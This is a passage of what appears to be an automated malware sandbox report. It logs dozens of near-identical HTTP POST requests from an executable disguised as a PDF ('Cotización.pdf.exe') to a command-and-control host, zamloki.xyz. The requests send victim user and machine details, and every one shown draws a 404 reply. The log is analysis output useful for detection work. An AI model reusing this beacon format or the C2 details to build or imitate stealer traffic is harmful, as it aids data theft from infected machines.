                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=sm11RF5tqaqfcG2THgatgdwA5S3DzAxoTCpvhnlNX2kNbRywdN8mlkAxlfUMx8gPeAw9PwP7Wjp3ENNw%2FlRv7PkB3mHOrCl5oxRbdez5Huge2%2Ffj84in62Rz3cGMvg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                      NEL: {"report_to":"cf-nel","max_age":604800}
                                      Server: cloudflare
                                      CF-RAY: 66f264effa110614-FRA
                                      alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                      Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                      Data Ascii: File not found.


                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                      42192.168.2.349776172.67.155.4580C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exe
                                      TimestampkBytes transferredDirectionData
                                      Jul 15, 2021 12:44:14.039047956 CEST5828OUTPOST /des/co/tox.php HTTP/1.0
                                      User-Agent: Mozilla/4.08 (Charon; Inferno)
                                      Host: zamloki.xyz
                                      Accept: */*
                                      Content-Type: application/octet-stream
                                      Content-Encoding: binary
                                      Content-Key: A3C8092
                                      Content-Length: 163
                                      Connection: close
                                      Jul 15, 2021 12:44:14.062964916 CEST5828OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 36 00 31 00 38 00 33 00 32 00 31 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                      Data Ascii: (ckav.ruhardz618321DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                      Jul 15, 2021 12:44:14.457182884 CEST5829INHTTP/1.1 404 Not Found
                                      Date: Thu, 15 Jul 2021 10:44:14 GMT
                                      Content-Type: text/html; charset=UTF-8
                                      Connection: close
                                      Status: 404 Not Found
                                      CF-Cache-Status: DYNAMIC
                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=lStCqfxufBE5SDnOJTKCPNNyw68rBRKmDur%2BmnLJbEQCINmLPaCUcb8SjrtxFfW4CSrnz4KnPyuQOUqQ%2BIEzyiuQ9ayP%2BWjsxGBFiVRYGWPHxI5qTAIQGxzVBzDyvg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                      NEL: {"report_to":"cf-nel","max_age":604800}
                                      Server: cloudflare
                                      CF-RAY: 66f264f3c9b4dfc3-FRA
                                      alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                      Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                      Data Ascii: File not found.


                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                      43192.168.2.349777104.21.6.22280C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exe
                                      TimestampkBytes transferredDirectionData
                                      Jul 15, 2021 12:44:14.674280882 CEST5830OUTPOST /des/co/tox.php HTTP/1.0
                                      User-Agent: Mozilla/4.08 (Charon; Inferno)
                                      Host: zamloki.xyz
                                      Accept: */*
                                      Content-Type: application/octet-stream
                                      Content-Encoding: binary
                                      Content-Key: A3C8092
                                      Content-Length: 163
                                      Connection: close
                                      Jul 15, 2021 12:44:14.694677114 CEST5830OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 36 00 31 00 38 00 33 00 32 00 31 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                      Data Ascii: (ckav.ruhardz618321DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                      Jul 15, 2021 12:44:14.949506998 CEST5831INHTTP/1.1 404 Not Found
                                      Date: Thu, 15 Jul 2021 10:44:14 GMT
                                      Content-Type: text/html; charset=UTF-8
                                      Connection: close
                                      Status: 404 Not Found
                                      CF-Cache-Status: DYNAMIC
                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v2?s=LLJiN848%2BVXhyGHzF7RbgjRQTe2HUmriBctNLiYo%2BpW3SoV6br5fudw0%2BPCpzJNTsolmq%2FM8dFBo7FRJbdRp4%2FQPFCNJ8tC%2BMy0uOroh9UDMsYY5Ag8xYik%3D"}],"group":"cf-nel","max_age":604800}
                                      NEL: {"report_to":"cf-nel","max_age":604800}
                                      Server: cloudflare
                                      CF-RAY: 66f264f7caf5dfcb-FRA
                                      alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                      Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                      Data Ascii: File not found.


                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                      44192.168.2.349778104.21.6.22280C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exe
                                      TimestampkBytes transferredDirectionData
                                      Jul 15, 2021 12:44:15.172918081 CEST5832OUTPOST /des/co/tox.php HTTP/1.0
                                      User-Agent: Mozilla/4.08 (Charon; Inferno)
                                      Host: zamloki.xyz
                                      Accept: */*
                                      Content-Type: application/octet-stream
                                      Content-Encoding: binary
                                      Content-Key: A3C8092
                                      Content-Length: 163
                                      Connection: close
                                      Jul 15, 2021 12:44:15.192617893 CEST5832OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 36 00 31 00 38 00 33 00 32 00 31 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                      Data Ascii: (ckav.ruhardz618321DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                      Jul 15, 2021 12:44:15.430037022 CEST5833INHTTP/1.1 404 Not Found
                                      Date: Thu, 15 Jul 2021 10:44:15 GMT
                                      Content-Type: text/html; charset=UTF-8
                                      Connection: close
                                      Status: 404 Not Found
                                      CF-Cache-Status: DYNAMIC
                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=aI5gQIHPF8obrLG7GGNcKOdab12oNDWnpZxDdBfmcRwbxcV75REcrT8nuDqFDl0NJgT1yD1zbtvYa7muqDVctwPp1nySMnf9NeMc46bmlw0w8now6EG4%2B0LxEMb%2FlQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                      NEL: {"report_to":"cf-nel","max_age":604800}
                                      Server: cloudflare
                                      CF-RAY: 66f264faed4c1f3d-FRA
                                      alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                      Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                      Data Ascii: File not found.


                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                      45192.168.2.349779172.67.155.4580C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exe
                                      TimestampkBytes transferredDirectionData
                                      Jul 15, 2021 12:44:15.665576935 CEST5834OUTPOST /des/co/tox.php HTTP/1.0
                                      User-Agent: Mozilla/4.08 (Charon; Inferno)
                                      Host: zamloki.xyz
                                      Accept: */*
                                      Content-Type: application/octet-stream
                                      Content-Encoding: binary
                                      Content-Key: A3C8092
                                      Content-Length: 163
                                      Connection: close
                                      Jul 15, 2021 12:44:15.683337927 CEST5834OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 36 00 31 00 38 00 33 00 32 00 31 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                      Data Ascii: (ckav.ruhardz618321DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                      Jul 15, 2021 12:44:15.942790985 CEST5835INHTTP/1.1 404 Not Found
                                      Date: Thu, 15 Jul 2021 10:44:15 GMT
                                      Content-Type: text/html; charset=UTF-8
                                      Connection: close
                                      Status: 404 Not Found
                                      CF-Cache-Status: DYNAMIC
                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v2?s=PyDwV6p4y%2BfQfHkLKKSwK4qdgv5ucDKXzouVIirB0Jy7B2rVkMFUiq9PGonYn0Vd7y1Gi734pRXVUgzcy8c8NaKOrIG5IKrm73igEYp4Y43W1ta2MHdjSYI%3D"}],"group":"cf-nel","max_age":604800}
                                      NEL: {"report_to":"cf-nel","max_age":604800}
                                      Server: cloudflare
                                      CF-RAY: 66f264fdfc574e5b-FRA
                                      alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                      Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                      Data Ascii: File not found.


                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                      46192.168.2.349780172.67.155.4580C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exe
                                      TimestampkBytes transferredDirectionData
                                      Jul 15, 2021 12:44:16.192708015 CEST5836OUTPOST /des/co/tox.php HTTP/1.0
                                      User-Agent: Mozilla/4.08 (Charon; Inferno)
                                      Host: zamloki.xyz
                                      Accept: */*
                                      Content-Type: application/octet-stream
                                      Content-Encoding: binary
                                      Content-Key: A3C8092
                                      Content-Length: 163
                                      Connection: close
                                      Jul 15, 2021 12:44:16.212333918 CEST5836OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 36 00 31 00 38 00 33 00 32 00 31 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                      Data Ascii: (ckav.ruhardz618321DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                      Jul 15, 2021 12:44:16.474409103 CEST5837INHTTP/1.1 404 Not Found
                                      Date: Thu, 15 Jul 2021 10:44:16 GMT
                                      Content-Type: text/html; charset=UTF-8
                                      Connection: close
                                      Status: 404 Not Found
                                      CF-Cache-Status: DYNAMIC
                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v2?s=mFVZfCmMk2npMA2VQReKHwrSU%2FVz%2FqQWe2sR6x3EPzgT9cJ9mfOWZmGmASMvcva5oCsskXX0k6ocHPCXJ7WS%2FigFeLG%2FEvwgJPn6xL%2FOTadT9dt%2BqGlo8Oo%3D"}],"group":"cf-nel","max_age":604800}
                                      NEL: {"report_to":"cf-nel","max_age":604800}
                                      Server: cloudflare
                                      CF-RAY: 66f265014933d721-FRA
                                      alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                      Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                      Data Ascii: File not found.


                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                      47192.168.2.349781104.21.6.22280C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exe
                                      TimestampkBytes transferredDirectionData
                                      Jul 15, 2021 12:44:16.711225986 CEST5837OUTPOST /des/co/tox.php HTTP/1.0
                                      User-Agent: Mozilla/4.08 (Charon; Inferno)
                                      Host: zamloki.xyz
                                      Accept: */*
                                      Content-Type: application/octet-stream
                                      Content-Encoding: binary
                                      Content-Key: A3C8092
                                      Content-Length: 163
                                      Connection: close
                                      Jul 15, 2021 12:44:16.729001999 CEST5838OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 36 00 31 00 38 00 33 00 32 00 31 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                      Data Ascii: (ckav.ruhardz618321DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                      Jul 15, 2021 12:44:17.164340973 CEST5838INHTTP/1.1 404 Not Found
                                      Date: Thu, 15 Jul 2021 10:44:17 GMT
                                      Content-Type: text/html; charset=UTF-8
                                      Connection: close
                                      Status: 404 Not Found
                                      CF-Cache-Status: DYNAMIC
                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v2?s=tym2f91T%2Bh7WYdYTbsyG1hTvedMvhYczYNulb8ViPBNmpPszQFAQLRx8B7cEyeItFfWQNZ1vbD5yTz3O8rChQZDv3j99ckSW32rEIymDF77vzAmBQ3mD3KU%3D"}],"group":"cf-nel","max_age":604800}
                                      NEL: {"report_to":"cf-nel","max_age":604800}
                                      Server: cloudflare
                                      CF-RAY: 66f2650489f12be9-FRA
                                      alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                      Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                      Data Ascii: File not found.


                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                      48192.168.2.349782104.21.6.22280C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exe
                                      TimestampkBytes transferredDirectionData
                                      Jul 15, 2021 12:44:17.401129007 CEST5839OUTPOST /des/co/tox.php HTTP/1.0
                                      User-Agent: Mozilla/4.08 (Charon; Inferno)
                                      Host: zamloki.xyz
                                      Accept: */*
                                      Content-Type: application/octet-stream
                                      Content-Encoding: binary
                                      Content-Key: A3C8092
                                      Content-Length: 163
                                      Connection: close
                                      Jul 15, 2021 12:44:17.421703100 CEST5840OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 36 00 31 00 38 00 33 00 32 00 31 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                      Data Ascii: (ckav.ruhardz618321DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                      Jul 15, 2021 12:44:17.669059038 CEST5840INHTTP/1.1 404 Not Found
                                      Date: Thu, 15 Jul 2021 10:44:17 GMT
                                      Content-Type: text/html; charset=UTF-8
                                      Connection: close
                                      Status: 404 Not Found
                                      CF-Cache-Status: DYNAMIC
                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v2?s=3nBtfg%2ByKYjUX9qKwLWe%2FxbIlOx3cW5qta00KLazWAf3t0bHWCoeUNqGMHT2mKGvnJN8wLGNbu3c6e8PEdpi7Zut0zj3PIHAKjjxSmVzBz8A5zydm%2FZArCk%3D"}],"group":"cf-nel","max_age":604800}
                                      NEL: {"report_to":"cf-nel","max_age":604800}
                                      Server: cloudflare
                                      CF-RAY: 66f26508dcbc4de2-FRA
                                      alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                      Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                      Data Ascii: File not found.


                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                      49192.168.2.349783172.67.155.4580C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exe
                                      TimestampkBytes transferredDirectionData
                                      Jul 15, 2021 12:44:17.926229954 CEST5841OUTPOST /des/co/tox.php HTTP/1.0
                                      User-Agent: Mozilla/4.08 (Charon; Inferno)
                                      Host: zamloki.xyz
                                      Accept: */*
                                      Content-Type: application/octet-stream
                                      Content-Encoding: binary
                                      Content-Key: A3C8092
                                      Content-Length: 163
                                      Connection: close
                                      Jul 15, 2021 12:44:17.947962046 CEST5841OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 36 00 31 00 38 00 33 00 32 00 31 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                      Data Ascii: (ckav.ruhardz618321DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                      Jul 15, 2021 12:44:18.191257000 CEST5842INHTTP/1.1 404 Not Found
                                      Date: Thu, 15 Jul 2021 10:44:18 GMT
                                      Content-Type: text/html; charset=UTF-8
                                      Connection: close
                                      Status: 404 Not Found
                                      CF-Cache-Status: DYNAMIC
                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v2?s=e87Sk9yoWOyZcCiaJNOOro4zVGbxQK%2F2jws10FsqRs1bIvh28dwhNcmHJNgMOYRZZFaKN6XDUVhjsEDHyEZoar0INHLRy88eAS%2FWQpVHkASnfJXvzXh9AH4%3D"}],"group":"cf-nel","max_age":604800}
                                      NEL: {"report_to":"cf-nel","max_age":604800}
                                      Server: cloudflare
                                      CF-RAY: 66f2650c19034a55-FRA
                                      alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                      Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                      Data Ascii: File not found.


                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                      5192.168.2.349730172.67.155.4580C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exe
                                      TimestampkBytes transferredDirectionData
                                      Jul 15, 2021 12:43:50.949748993 CEST1376OUTPOST /des/co/tox.php HTTP/1.0
                                      User-Agent: Mozilla/4.08 (Charon; Inferno)
                                      Host: zamloki.xyz
                                      Accept: */*
                                      Content-Type: application/octet-stream
                                      Content-Encoding: binary
                                      Content-Key: A3C8092
                                      Content-Length: 163
                                      Connection: close
                                      Jul 15, 2021 12:43:50.967760086 CEST1377OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 36 00 31 00 38 00 33 00 32 00 31 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                      Data Ascii: (ckav.ruhardz618321DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                      Jul 15, 2021 12:43:51.218986034 CEST1377INHTTP/1.1 404 Not Found
                                      Date: Thu, 15 Jul 2021 10:43:51 GMT
                                      Content-Type: text/html; charset=UTF-8
                                      Connection: close
                                      Status: 404 Not Found
                                      CF-Cache-Status: DYNAMIC
                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v2?s=L48oDPFQUJ6lvIHGCj9qHbPXREB%2F0tYTK348NzPJC6IKc539aC5Aq%2BUOAigDjIZkkb4eUoP%2B8siY2%2BcZpF8Ee3QmCRnMAlq%2FDxb9BZDgy2ZpkJ8OKTVPhGM%3D"}],"group":"cf-nel","max_age":604800}
                                      NEL: {"report_to":"cf-nel","max_age":604800}
                                      Server: cloudflare
                                      CF-RAY: 66f2646378614e8c-FRA
                                      alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                      Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                      Data Ascii: File not found.


                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                      50192.168.2.349784172.67.155.4580C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exe
                                      TimestampkBytes transferredDirectionData
                                      Jul 15, 2021 12:44:18.410196066 CEST5843OUTPOST /des/co/tox.php HTTP/1.0
                                      User-Agent: Mozilla/4.08 (Charon; Inferno)
                                      Host: zamloki.xyz
                                      Accept: */*
                                      Content-Type: application/octet-stream
                                      Content-Encoding: binary
                                      Content-Key: A3C8092
                                      Content-Length: 163
                                      Connection: close
                                      Jul 15, 2021 12:44:18.428257942 CEST5843OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 36 00 31 00 38 00 33 00 32 00 31 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                      Data Ascii: (ckav.ruhardz618321DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                      Jul 15, 2021 12:44:18.691159010 CEST5844INHTTP/1.1 404 Not Found
                                      Date: Thu, 15 Jul 2021 10:44:18 GMT
                                      Content-Type: text/html; charset=UTF-8
                                      Connection: close
                                      Status: 404 Not Found
                                      CF-Cache-Status: DYNAMIC
                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v2?s=fB5Wfl2lpPSWUJqqYl3%2BT3VTMqJ5M468DntMF5H01eg3s1cRPvlG0UvQrDXAhnI2husMeoR81JKxecqCq24fnymbAH5ETH905XeMrDJDhLaZDzxTk5jqUhw%3D"}],"group":"cf-nel","max_age":604800}
                                      NEL: {"report_to":"cf-nel","max_age":604800}
                                      Server: cloudflare
                                      CF-RAY: 66f2650f1b2f4a8c-FRA
                                      alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                      Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                      Data Ascii: File not found.


                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                      51192.168.2.349785104.21.6.22280C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exe
                                      TimestampkBytes transferredDirectionData
                                      Jul 15, 2021 12:44:18.933048964 CEST5845OUTPOST /des/co/tox.php HTTP/1.0
                                      User-Agent: Mozilla/4.08 (Charon; Inferno)
                                      Host: zamloki.xyz
                                      Accept: */*
                                      Content-Type: application/octet-stream
                                      Content-Encoding: binary
                                      Content-Key: A3C8092
                                      Content-Length: 163
                                      Connection: close
                                      Jul 15, 2021 12:44:18.953643084 CEST5845OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 36 00 31 00 38 00 33 00 32 00 31 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                      Data Ascii: (ckav.ruhardz618321DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                      Jul 15, 2021 12:44:19.255719900 CEST5846INHTTP/1.1 404 Not Found
                                      Date: Thu, 15 Jul 2021 10:44:19 GMT
                                      Content-Type: text/html; charset=UTF-8
                                      Connection: close
                                      Status: 404 Not Found
                                      CF-Cache-Status: DYNAMIC
                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v2?s=7tqhST4pRBKg7RxMA877FKnuWJ7bDyI97mLP3tCsQmS%2FmCfV91I%2FzxiXVI0aqaoPmXVHBup8mhSD5%2FVm1c4z9%2FZnwD2r86NDugjjxpgM2aFt4%2F82mcmhRYo%3D"}],"group":"cf-nel","max_age":604800}
                                      NEL: {"report_to":"cf-nel","max_age":604800}
                                      Server: cloudflare
                                      CF-RAY: 66f265126c41178a-FRA
                                      alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                      Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                      Data Ascii: File not found.


                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                      52192.168.2.349786104.21.6.22280C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exe
                                      TimestampkBytes transferredDirectionData
                                      Jul 15, 2021 12:44:19.492387056 CEST5847OUTPOST /des/co/tox.php HTTP/1.0
                                      User-Agent: Mozilla/4.08 (Charon; Inferno)
                                      Host: zamloki.xyz
                                      Accept: */*
                                      Content-Type: application/octet-stream
                                      Content-Encoding: binary
                                      Content-Key: A3C8092
                                      Content-Length: 163
                                      Connection: close
                                      Jul 15, 2021 12:44:19.513118982 CEST5847OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 36 00 31 00 38 00 33 00 32 00 31 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                      Data Ascii: (ckav.ruhardz618321DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                      Jul 15, 2021 12:44:19.755143881 CEST5848INHTTP/1.1 404 Not Found
                                      Date: Thu, 15 Jul 2021 10:44:19 GMT
                                      Content-Type: text/html; charset=UTF-8
                                      Connection: close
                                      Status: 404 Not Found
                                      CF-Cache-Status: DYNAMIC
                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=IycD7Eyh%2B4qarhP7qXpH8BlHmIoXe%2Bufzvj5iV45%2FtdkW9CNMnIM8gL5lTnk2qdoOnfsgaj1WjRINgI%2Fe%2FQD4cjelqzXuijVn51W4rdytGeRhEGPdgU5gZZ1kHAmMQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                      NEL: {"report_to":"cf-nel","max_age":604800}
                                      Server: cloudflare
                                      CF-RAY: 66f26515eddf4dd6-FRA
                                      alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                      Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                      Data Ascii: File not found.


                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                      53192.168.2.349787104.21.6.22280C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exe
                                      TimestampkBytes transferredDirectionData
                                      Jul 15, 2021 12:44:20.003487110 CEST5849OUTPOST /des/co/tox.php HTTP/1.0
                                      User-Agent: Mozilla/4.08 (Charon; Inferno)
                                      Host: zamloki.xyz
                                      Accept: */*
                                      Content-Type: application/octet-stream
                                      Content-Encoding: binary
                                      Content-Key: A3C8092
                                      Content-Length: 163
                                      Connection: close
                                      Jul 15, 2021 12:44:20.021424055 CEST5849OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 36 00 31 00 38 00 33 00 32 00 31 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                      Data Ascii: (ckav.ruhardz618321DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                      Jul 15, 2021 12:44:20.264513016 CEST5850INHTTP/1.1 404 Not Found
                                      Date: Thu, 15 Jul 2021 10:44:20 GMT
                                      Content-Type: text/html; charset=UTF-8
                                      Connection: close
                                      Status: 404 Not Found
                                      CF-Cache-Status: DYNAMIC
                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=TUT9qAMLAzwUcy%2BzdiAzXarA7BYRDMt4MhvsZRsb8UP%2FiOqzvfQyuj27SQx0udpPTkV2oEkwUy18vm464rz2dRrrcgmAJb1AaHZQlfT4i19W4uUUD1NGal8vk%2BYPWQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                      NEL: {"report_to":"cf-nel","max_age":604800}
                                      Server: cloudflare
                                      CF-RAY: 66f265191a192b4d-FRA
                                      alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                      Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                      Data Ascii: File not found.


                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                      54192.168.2.349788104.21.6.22280C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exe
                                      TimestampkBytes transferredDirectionData
                                      Jul 15, 2021 12:44:20.510212898 CEST5850OUTPOST /des/co/tox.php HTTP/1.0
                                      User-Agent: Mozilla/4.08 (Charon; Inferno)
                                      Host: zamloki.xyz
                                      Accept: */*
                                      Content-Type: application/octet-stream
                                      Content-Encoding: binary
                                      Content-Key: A3C8092
                                      Content-Length: 163
                                      Connection: close
                                      Jul 15, 2021 12:44:20.530631065 CEST5851OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 36 00 31 00 38 00 33 00 32 00 31 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
